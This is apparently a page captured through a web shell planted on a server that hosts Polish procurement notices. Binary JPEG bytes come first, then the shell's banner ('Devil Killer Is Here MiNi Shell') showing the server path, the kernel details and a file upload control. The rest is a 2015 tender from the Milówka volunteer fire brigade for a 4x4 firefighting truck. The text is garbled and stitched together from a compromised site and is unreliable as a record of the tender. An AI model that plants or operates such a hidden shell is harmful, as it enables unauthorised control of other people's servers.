JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150814/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150814/209070-N-2015.html

<p class="kh_header"><b>Milówka: Zakup fabrycznie nowego średniego  samochodu specjalnego pożarniczego, ratowniczo - gaśniczego
na podwoziu z napędem   4x4   dla OSP  w Milówce</b><br>
<b>Numer ogłoszenia: 209070 - 2015; data zamieszczenia: 14.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicza Straż Pożarna w Milówce , ul. Dworcowa 21, 34-360 Milówka, woj. śląskie, tel. 33 863 70 98.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ochotnicza Straż Pożarna Milówka.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup fabrycznie nowego średniego  samochodu specjalnego pożarniczego, ratowniczo - gaśniczego
na podwoziu z napędem   4x4   dla OSP  w Milówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego średniego samochodu specjalnego pożarniczego, ratowniczo - gaśniczego z napędem 4x4. 
Miejscem wykonania zamówienia jest siedziba Oferenta. Zamawiający wyznaczy osobę upoważnioną do odbioru przedmiotu zamówienia. Potwierdzeniem odbioru przedmiotu zamówienia będzie: protokół zdawczo odbiorczy  oraz przyjęcie przez Zamawiającego faktury VAT.  
Oferowany przez Wykonawcę dostawy samochód powinien spełniać warunki, od których właściwe przepisy prawa w tym ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym, umożliwiają dopuszczenie danego pojazdu do ruchu na terytorium RP, potwierdzone świadectwem homologacji  dla danego typu pojazdu.
Szczegółowy opis przedmiotu zamówienia
Podstawowe wymagania techniczne i użytkowe, jakie powinien spełniać oferowany samochodu:
Wymagania dla średniego  samochodu specjalnego   pożarniczego, ratowniczo - gaśniczego 
na podwoziu z napędem   4x4   dla OSP  w Milówce 
WYMAGANIA PODSTAWOWE	
Pojazd powinien spełniać wymagania polskich przepisów o ruchu drogowym zgodnie z Ustawą Prawo o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych	 
Pojazd powinien spełniać przepisy Polskiej Normy PN-EN 1846-1 oraz PN-EN 1846-2	
Pojazd powinien spełniać minimalne Wymagania techniczno-użytkowe dla wyrobów służących zapewnieniu bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, wprowadzanych do użytkowania w jednostkach ochrony przeciwpożarowej -Rozporządzenie Ministra Spraw Wewnętrznych i Administracji -Dz.U. Nr 143 poz. 1002 z 2007r , i  Rozporządzenie  zmieniające-Dz.U. Nr 85 poz 553 z 2010r	
Samochód musi posiadać świadectwo dopuszczenia wyrobu, do stosowania w jednostkach ochrony przeciwpożarowej wydany przez polską jednostkę certyfikującą.
Świadectwo ważne na dzień odbioru samochodu.
Należy potwierdzić spełnienie wymagań i załączyć kompletne świadectwo dopuszczenia  przy odbiorze samochodu  dwie strony	
PODWOZIE Z KABINĄ	
Maksymalna masa rzeczywista  samochodu gotowego do  akcji ratowniczo-gaśniczej pojazd z załogą, pełnymi zbiornikami, zabudową i wyposażeniem- nie może przekroczyć  16 000 kg	
Samochód wyposażony w silnik wysokoprężny o mocy min.  220kW	
Samochód fabrycznie nowy, rok produkcji podwozia min. 2015 r 	
Samochód wyposażony w podwozie drogowe  w układzie napędowym:
 4x4 -uterenowiony z :
przekładnią rozdzielczą z możliwością wyboru przełożeń  szosowych i terenowych
blokadą mechanizmu różnicowego osi tylnej , przedniej  oraz międzyosiowego
napęd stały osi przedniej
na osi przedniej koła pojedyncze , na osi tylnej  koła   podwójne
skrzynia biegów-manualna 6 biegowa plus wsteczny
hamulce bębnowe
system  ABS- z możliwością odłączenia podczas  jazdy w  terenie- sposób odłączania w gestii Wykonawcy  
światła do jazdy dziennej uruchamiane po przekręceniu kluczyka           	
Samochód wyposażony w silnik o zapłonie samoczynnym , posiadający aktualne normy ochrony środowiska czystości spalin  spełniający  normę emisji spalin- min. Euro 6	
Zawieszenie osi przedniej i tylnej:
mechaniczne- resory paraboliczne,
amortyzatory teleskopowe,
stabilizatory przechyłów 	                               
Kabina  fabrycznie jednomodułowa czterodrzwiowa, zapewniająca dostęp do silnika,  układzie miejsc 1+1+4   (siedzenia przodem  do kierunku jazdy),
Kabina wyposażona w :
klimatyzację
indywidualne oświetlenie  do czytania mapy dla pozycji dowódcy
niezależny układ ogrzewania, umożliwiający ogrzewanie kabiny przy wyłączonym silniku
reflektor pogorzeliskowy na zewnątrz kabiny z gniazdem elektrycznym z prawej strony
zewnętrzną osłonę przeciwsłoneczną z przodu  dachu kabiny
elektrycznie sterowane szyby po stronie kierowcy i dowódcy
elektrycznie sterowane lusterka po stronie kierowcy i dowódcy
lusterka zewnętrzne, elektrycznie podgrzewane główne i szerokokątne
lusterko rampowe-krawężnikowe  z prawej strony
lusterko rampowe- dojazdowe, przednie 
poręcz do trzymania w tylnej części kabiny
wywietrznik dachowy
szperacz  ręczny zasilany z gniazda zapalniczki
Kabina wyposażona dodatkowo w:
uchwyty na 4 aparaty  oddechowe, umieszczone w oparciach tylnych siedzeń.
uchwyty na aparaty  nie powinny w żadnym stopniu zmniejszać  przestrzeni załogi i ograniczać powierzchni  siedziska   
odblokowanie każdego aparatu indywidualnie
dźwignia odblokowująca o konstrukcji uniemożliwiającej przypadkowe odblokowanie np. w czasie hamowania pojazdu
w przypadku gdy aparaty nie są przewożone, wstawienie oparć w miejscu mocowania aparatów
schowek pod siedzeniami w tylnej części kabiny
Przestrzeń pomiędzy maksymalnie odsuniętym do tyłu fotelem kierowcy a tylną ścianą  kabiny minimum 1600 mm	
Fotele wyposażone w bezwładnościowe pasy bezpieczeństwa. Siedzenia pokryte materiałem  łatwozmywalnym, o zwiększonej odporności na  ścieranie. Fotele wyposażone w zagłówki. 
Fotel dla kierowcy:
z pneumatyczną regulacją wysokości,
z regulacją dostosowania do ciężaru ciała 
z regulacją odległości całego fotela
z regulacją pochylenia oparcia 
Fotel dla pasażera(dowódcy):
z mechaniczną regulacją wysokości 
z regulacją odległości całego fotela
z regulacją pochylenia oparcia
zapewniające minimalny, należyty komfort jazdy i optymalną pozycję dla kierowcy i pasażera	
W kabinie kierowcy  zamontowane następujące urządzenia:
radiotelefon samochodowy, przewoźny, tryb cyfrowo-analogowy o parametrach min: częstotliwość VHF 136-174 MHz, moc 5-25 W,   odstęp między kanałowy 12,5 kHz 
radio z odtwarzaczem CD
podest do ładowarek radiostacji przenośnych i latarek z wyłącznikiem.	
Dodatkowe urządzenia  zamontowane w kabinie:
sygnalizacja otwarcia żaluzji skrytek i podestów, z alarmem świetlnym i słownym
sygnalizacja informująca o wysunięciu masztu, z alarmem świetlnym i słownym 
Zamawiający wymaga alarmu słownego o treści: otwarte żaluzje, otwarte podesty, 
wysunięty maszt,załączone gniazdo ładowania
sygnalizacja załączonego gniazda ładowania i stan naładowania akumulatorów
główny wyłącznik oświetlenia skrytek 
sterowanie zraszaczami  
sterowanie niezależnym ogrzewaniem kabiny i przedziału  pracy autopompy
kontrolka włączenia autopompy
wskaźnik poziomu wody w zbiorniku
wskaźnik poziomu środka pianotwórczego w zbiorniku
wskaźnik  niskiego  ciśnienia
wskaźnik  wysokiego  ciśnienia	
Pojazd  wyposażony w urządzenie sygnalizacyjno- ostrzegawcze akustyczne i świetlne, pojazdu uprzywilejowanego. Urządzenie akustyczne powinno umożliwiać podawanie komunikatów słownych.
Głośnik lub głośniki o mocy  min. 200W
Sterowanie przy pomocy manipulatora na elastycznym przewodzie ,zmiana modulacji dźwiękowej sygnału  poprzez klakson pojazdu, manipulator powinien być funkcjonalny, czytelny  i posiadać wyraźne, podświetlane  oznaczenia trybu pracy w ciągu  dnia i nocy.
Wymagana funkcjonalność podstawowa:
 załączenie sygnałów dźwiękowych i świetlnych jednym przyciskiem pojedyncze krótkie naciśnięcie przycisku
wyłączenie sygnałów dźwiękowych pojedyncze krótkie  naciśnięcie przycisku
wyłączenie sygnałów dźwiękowych, świetlnych pojedyncze długie naciśnięcie przycisku   
Na dachu kabiny zamontowana  kompozytowa nadbudowa   z zamontowaną , lampą zespolona z napisem STRAŻ z głośnikiem i dwie wyprofilowane, ukształtowane aerodynamicznie z łagodnie zaokrąglonymi kształtami naroży  lampy niebieskie  LED, oraz zamontowane dwie lampy dalekosiężne w nadbudowie górnej
dodatkowo 4 lampy sygnalizacyjne niebieskie  LED  z przodu pojazdu
orurowanie z przodu pojazdu
z boków  pojazdu po jednej niebieskiej lampie LED wbudowane w kompozytowe balustrady boczne 
Na ścianie tylnej pojazdu, w narożach   dwie lampy   niebieskie ukształtowane aerodynamicznie 
fala świetlna LED umieszczona na tylnej ścianie nadwozia 
Na ścianie dolnej tylnej nadwozia z lewej i prawej strony zamontowane  dwie  lampy zespolone  tylne z zabezpieczeniami ochronnymi   	
Instalacja elektryczna  wyposażona w główny wyłącznik prądu.	
Pojazd  wyposażony w zintegrowany układ z wyrzutnikiem do ładowania akumulatorów  z zewnętrznego źródła 230V,  podłączenie zblokowane w jednym gnieździe przyłączeniowym  ze złączem  do uzupełniania powietrza w układzie  pneumatycznym z sieci  stacjonarnej,  z wtyczką i przewodem o długości min 4mb, umieszczonym po lewej stronie. 
Złącze musi być  samo rozłączalne  w momencie rozruchu silnika. Ładowarka-prostownik zamontowana  na samochodzie.
W kabinie kierowcy sygnalizacja  wizualna i dźwiękowa podłączenia instalacji  do zewnętrznego źródła.       	
Pojazd  wyposażony w sygnalizację świetlną i dźwiękową włączonego biegu wstecznego jako sygnalizację świetlną dopuszcza się światło cofania.	
Pojazd  wyposażony w sygnał pneumatyczny, włączany dodatkowym włącznikiem z miejsca dostępnego dla kierowcy i dowódcy.	
Pojazd wyposażony w hak holowniczy, paszczowy typu Ringfeder, Rockinger  lub równoważny, przystosowany do ciągnięcia przyczep, zgodnie z homologacją podwozia, o masie min. 12 ton . Złącza elektryczne i pneumatyczne muszą współpracować z przyczepą. Instalacja elektryczna musi współpracować z przyczepami wyposażonymi w ledowe źródła światła. Zaczep z przodu pojazdu przystosowany do holowania pojazdu holem sztywnym.	
Ogumienie uniwersalne, szosowo-terenowe  z bieżnikiem dostosowanym do różnych warunków  atmosferycznych lato, zima 
Pełnowymiarowe koło zapasowe  na wyposażeniu pojazdu-dopuszcza się brak stałego mocowania w pojeździe                                                                                                        Kolory samochodu:
elementy podwozia, rama - w kolorze czarnym lub zbliżonym 
błotniki i zderzaki - w kolorze białym
żaluzje skrytek - w kolorze naturalnym aluminium
kabina, zabudowa- w kolorze czerwonym RAL 3000.	
ZABUDOWA POŻARNICZA	
Maksymalna wysokość całkowita pojazdu-3300mm - dostosowana do wysokości bramy garażowej.
Zabudowa nadwozia wykonana w całości z materiałów odpornych na korozję metalowo-kompozytowa
Wewnętrzne poszycia bocznych skrytek wyłożone  anodowaną  gładką blachą aluminiową, spody schowków- blachą  nierdzewną
Balustrady ochronne boczne -dachu wykonane  ze specjalnych materiałów kompozytowych
Po trzy skrytki na bokach pojazdu (w układzie 3+3+1)
Pomiędzy kabiną a zabudową pożarniczą zamontowana kompozytowa osłona  ochronno-maskująca.	
Wymagane otwierane lub wysuwne podesty pod wszystkimi schowkami bocznymi zabudowy, które  umożliwią   łatwy i bezpieczny  dostęp w czasie akcji ratowniczo-gaśniczej, do sprzętu położonego w górnych partiach schowków, na całej długości zabudowy .
Musi być zainstalowany podest otwierany lub wysuwny  nad kołami tylnymi po obu stronach zabudowy. 
Otwarcie i zamknięcie podestów wspomagane systemem teleskopowym  	
Otwarcie lub wysunięcie podestu, musi być sygnalizowane w kabinie kierowcy. 
Otwierane lub wysuwne podesty poza obrys pojazdu, muszą  posiadać oznakowanie ostrzegawcze	
Skrytki na sprzęt i przedział autopompy wysokociśnieniowej  wyposażone w oświetlenie , podwójne listwy- LED, umieszczone pionowo po obu stronach schowka, przy prowadnicy żaluzji, włączane automatycznie po otwarciu  drzwi-żaluzji skrytki. W kabinie zamontowana sygnalizacja otwarcia skrytek.
Główny wyłącznik oświetlenia skrytek, zainstalowany w kabinie kierowcy.	
Pojazd posiada oświetlenie pola pracy wokół samochodu:
oświetlenie składające się z lamp bocznych do oświetlenia dalszego pola pracy wbudowane w kompozytowe balustrady boczne min. 3 szt. na stronę zewnętrznych listew LED, zamontowanych nad żaluzjami,  do oświetlenia pola bezpośrednio przy pojeździe bezpieczeństwo obsługi nadwozia wokół samochodu, w czasie akcji ratowniczej.
oświetlenie powierzchni dachu, lampami typu LED
oświetlenia włączane z przedziału autopompy   
W kabinie musi być zainstalowany włącznik do  załączenia oświetlenia zewnętrznego, z możliwością sterowania  oświetleniem z tablicy   autopompy
Z tyłu pojazdu w dolnej części po obu stronach pojazdu zamontowane obrysówki LED widoczne w lusterkach wstecznych kierowcy.	   
Szuflady i wysuwane tace  automatycznie, blokują się w pozycji wsuniętej   i całkowicie wysuniętej  i posiadają zabezpieczenie  przed całkowitym wyciągnięciem.
Szuflady i tace wystające w pozycji otwartej powyżej 250 mm poza obrys pojazdu, posiadają  oznakowanie ostrzegawcze.	
Półki sprzętowe wykonane z aluminium, w systemie z możliwością regulacji położenia ustawienia wysokości półek-w zależności od potrzeb użytkownika	
Schowki wyposażone w regały, palety wysuwne lub obrotowe: na urządzenie ratownicze, agregat prądotwórczy, sprzęt ratowniczy, w zależności od potrzeb i możliwości  zamontowania danego sprzętu. 	
Skrytki na sprzęt i wyposażenie zamykane żaluzjami aluminiowymi. Drzwi żaluzjowe wyposażone w zamki, jeden klucz pasuje do wszystkich zamków. Wymagane dodatkowe zabezpieczenie przed otwarciem żaluzji -typu rurkowego.	
Dach zabudowy  wykonany w formie podestu roboczego w wykonaniu antypoślizgowym. Balustrada ochronna boczna -dachu wykonana  z materiałów kompozytowych  jako  część z nadbudową pożarniczą z elementami  barierki rurowej , o wysokości min 180 mm. 	
Na dachu pojazdu zamontowana zamykana skrzynia aluminiowa na drobny sprzęt o wymiarach w przybliżeniu 1400x460x270 mm, posiadająca oświetlenie wewnętrzne typu LED oraz  uchwyty z rolkami  na drabinę dwuprzęsłową wysuwną z podporami ,uchwyty na węże ssawne, bosak, mostki przejazdowe, tłumice itp.	
Pojazd  posiada  drabinkę do wejścia na dach z tyłu samochodu ,wykonana z materiałów nierdzewnych,  umieszczoną po prawej stronie .W górnej części drabinki zamontowane poręcze ułatwiające wchodzenie. 	
Powierzchnie platform, podestów roboczych i podłogi  kabiny w wykonaniu antypoślizgowym	
Zbiornik wody o pojemności  min.  3,5  m3, wykonany  z  materiałów kompozytowych.
Zbiornik  wyposażony w oprzyrządowanie umożliwiające jego bezpieczną  eksploatację, 
z układem  zabezpieczającym przed swobodnym wypływem wody  w czasie  jazdy.
Zbiornik  wyposażony w  falochrony i  właz rewizyjny. 	
Zbiornik wody wyposażony w dwie nasady  75 mm po jednej z każdej strony z zaworami kulowymi ,w zamykanych schowkach.
Wlot do napełniania z hydrantu wyposażony w zawór odcinający oraz sito.
Zbiornik wyposażony  w urządzenie przelewowe zabezpieczające przed uszkodzeniem podczas napełniania.
Układ zbiornika wyposażony w  automatyczny zawór napełniania hydrantowego zabezpieczającego  przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną.	                          
Zbiornik środka pianotwórczego, wykonany z materiałów kompozytowych, odpornych na działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów o pojemności min.10% pojemności zbiornika wodnego.
Napełnianie zbiornika środkiem pianotwórczym,  możliwe z poziomu terenu i z dachu pojazdu.	
Układ wodno-pianowy  wyposażony w ręczny dozownik środka pianotwórczego dostosowany do wydajności autopompy, zapewniający uzyskiwanie co najmniej  stężeń 3% i 6% tolerancja +0,5% w całym zakresie pracy.   	
Autopompa  zlokalizowana z tyłu pojazdu w obudowanym przedziale, zamykanym drzwiami żaluzjowymi.    
Autopompa dwuzakresowa ze stopniem  wysokiego ciśnienia
wydajność, min.3200 l/min, przy ciśnieniu  8 bar i głębokości ssania 1,5m
wydajność  stopnia wysokiego ciśnienia, min. 400 l/min  przy ciśnieniu  40 bar              	            
Autopompa  umożliwia podanie wody i wodnego roztworu środka pianotwórczego do minimum:
dwóch nasad tłocznych 75 mm zlokalizowanych z tyłu pojazdu, po bokach, w zamykanych schowkach
wysokociśnieniowej linii szybkiego natarcia
działka wodno-pianowego
zraszaczy                                  
Autopompa  umożliwia podanie wody do zbiornika samochodu.
Autopompa  wyposażona w urządzenie odpowietrzające umożliwiające zassanie wody:
z głębokości 1,5 m w czasie do 30 sek.
z głębokości 7,5 m w czasie do 60 sek.
Autopompa  wyposażona w  układ utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy. 	
Na wlocie ssawnym autopompy , zamontowany element zabezpieczający przed przedostaniem się do pompy zanieczyszczeń stałych zarówno przy ssaniu ze zbiornika zewnętrznego jak i ze zbiornika własnego pojazdu, gwarantujący bezpieczną eksploatację pompy.	
Wszystkie elementy układu wodno-pianowego , odporne na korozję i działanie dopuszczonych do stosowania środków pianotwórczych i modyfikatorów.	
W przedziale autopompy  znajdują się co najmniej następujące urządzenia kontrolno - sterownicze pracy pompy:
manowakuometr
manometr niskiego ciśnienia
manometr wysokiego ciśnienia 
wskaźnik poziomu wody w zbiorniku samochodu
wskaźnik poziomu środka pianotwórczego w zbiorniku
regulator prędkości obrotowej silnika pojazdu
miernik prędkości obrotowej wału pompy
wyłącznik silnika pojazdu
kontrolka  ciśnienia oleju i temperatury cieczy chłodzącej silnik
kontrolka włączenia autopompy
licznik motogodzin-pracy autopompy
W przedziale autopompy należy, zamontować zespół:
sterowania automatycznym  układem utrzymywania stałego ciśnienia tłoczenia, umożliwiający sterowanie z regulacją automatyczną i ręczną ciśnienia pracy
sterownia automatycznym zaworem napełniania hydrantowego  zabezpieczającym przed przepełnieniem zbiornika wodnego z możliwością przełączenia na pracę ręczną
sterowania ręcznym lub automatycznym  układem dozowania środka pianotwórczego  w całym zakresie pracy autopompy 	
Przedział pracy autopompy  wyposażony w dodatkowy zewnętrzny głośnik z mikrofonem, połączony z radiotelefonem samochodowym.
Podwójne, bryzgoszczelne gniazdo zapalniczki 12V min. 15A, zabezpieczone bezpiecznikiem z łatwym dostępem dla obsługującego	
Przedział pracy autopompy  wyposażony w system ogrzewania  działający niezależnie od pracy silnika. Montaż sterowania ogrzewaniem, z kabiny kierowcy.	
W przedziale pracy  autopompy, na tablicy sterującej ,wymagane są   zamontowane włączniki do uruchamiania silnika pojazdu,  załączenia i wyłączenia autopompy oraz wyłączania silnika pojazdu.  Włączniki muszą  być aktywne  przy neutralnej pozycji skrzyni biegów i załączonym ręcznym hamulcu postojowym.	
Działko wodno-pianowe o regulowanej wydajności z lampą oświetlającą strumień wody, umieszczone na dachu pojazdu z nakładką do piany . Wydajność działka min 800-1600 l /min,  przy podstawie działka  zamontowany zawór odcinający. Dopuszcza się zastosowanie  zaworu odcinającego  ze sterowaniem elektryczno-pneumatycznym. 	
Samochód  wyposażony w wysokociśnieniową  linię szybkiego natarcia o długości węża min. 60 mb, umieszczoną na zwijadle, zakończoną prądownicą wodno-pianową o regulowanej wydajności, umożliwiającą podawanie zwartego i  rozproszonego strumienia wody oraz piany.
Linia szybkiego natarcia  umożliwia podawanie wody lub piany z prądownicy bez względu na stopień rozwinięcia węża.
Zwijadło  wyposażone w  napęd elektryczny i ręczny.
Szybkie natarcie wyposażone w pneumatyczny system odwadniania, umożliwiający opróżnienie   linii przy użyciu sprężonego powietrza.  	
Instalacja układu zraszaczy zasilanych od autopompy:
min 4 dysze do podawania wody w czasie jazdy, zabezpieczone zaworem ciśnieniowym
dwa zraszacze zamontowane przed przednią osią
dwa zraszacze zamontowane po bokach pojazdu
Instalacja powinna być wyposażona w zawory odcinające jeden dla zraszaczy przednich, drugi dla zraszaczy bocznych Montaż sterowania zraszaczami z kabiny kierowcy.	
Pojazd  wyposażony w wysuwany maszt oświetleniowy  z głowicą z  dwoma reflektorami, wyposażonymi w  lampy  LED o  strumieniu świetlnym  min. 20 000 lumenów, zasilany z instalacji elektrycznej pojazdu napięciem  24V, wyposażone w soczewki zapewniające  szerokie rozproszenie światła. 
Maszt musi posiadać zainstalowane  automatyczne przełączanie zasilania z 24V na zasilanie z agregatu prądotwórczego-230V 
wysokość rozłożonego masztu, mierzona od podłoża do oprawy reflektorów- minimum  
    5 metrów.
obrót i pochył reflektorów, o kąt co najmniej od 0o ÷ 170o - w obie strony
sterowanie masztem odbywa się z poziomu ziemi.  
złożenie masztu następuje, bez konieczności ręcznego wspomagania 
w kabinie  znajduje się sygnalizacja informująca o wysunięciu masztu 
wysunięcie masztu następuje tylko na postoju po zaciągnięciu hamulca ręcznego
wymagana  funkcja  automatycznego złożenia masztu po wyłączeniu hamulca ręcznego
wymagana możliwość sterowania masztem na różnej wysokości wysuwu
wysuw masztu  realizowany z instalacji pneumatycznej samochodu
oprócz ręcznego, wymagane jest bezprzewodowe sterowanie masztem pilotem obrotem i pochyłem reflektorów oraz załączeniem oświetlenia, dla każdego reflektora osobno zasięg min 50 mb	
Pojazd musi być wyposażony w : 
kamerę monitorującą  strefę z tyłu pojazdu. Kamera przystosowana do pracy w każdych warunkach atmosferycznych. Monitor przekazujący obraz, kolorowy o przekątnej min 7 cali, zamontowany w kabinie w zasięgu wzroku kierowcy. Minimum 3 punktowe  załączanie: po wstecznym, na 10sek i na stałą obserwację,
nawigację GPS	
WYPOSAŻENIE	
Pojazd wyposażony w sprzęt  standardowy, dostarczany z podwoziem, min: 
2 kliny, klucz do kół, podnośnik hydrauliczny z dźwignią, trójkąt ostrzegawczy, apteczka, gaśnica,  wspornik  zabezpieczenia podnoszonej kabiny, koło zapasowe 	
Pojazd -wyposażony w zestaw sprzętu m.in :
łom zwykły-1szt
łomo-wyciągacz-1szt
młotek 2 kg i 4 kg- po 1szt
siekiera-1szt
nożyce do drutu-1szt	
Na pojeździe  zapewnione miejsce na przewożenie sprzętu zgodnie z  Wymaganiami dla samochodów ratowniczo-gaśniczych
Szczegóły dotyczące rozmieszczenia sprzętu do uzgodnienia z użytkownikiem na etapie realizacji zamówienia. 
Zamawiający na etapie wykonania dostarczy wykaz wraz z posiadanym  sprzętem do zamontowania.
Montaż sprzętu  na koszt wykonawcy. Zamawiający dopuszcza w trakcie eksploatacji możliwości samodzielnego montażu sprzętu dodatkowego, po konsultacji i przy wykorzystaniu mocowań dostarczonych przez Wykonawcę, bez wpływu na warunki gwarancji pojazdu.
Samochód należy doposażyć w  :
z przodu pojazdu montaż wyciągarki  elektrycznej o sile uciągu minimum -8ton z liną o długości min. 25m, wraz z pokrowcem 
2szt latarek kątowych typu Ex z ładowarkami i 2szt- radiostacji cyfrowo-analogowych przenośnych z ładowarkami, zamontowane w kabinie na specjalnym podeście
Agregat prądotwórczy min 2,5 kVA, stopień ochrony IP 54 
dwa komplety łańcuchów na koła	
OZNACZENIE	
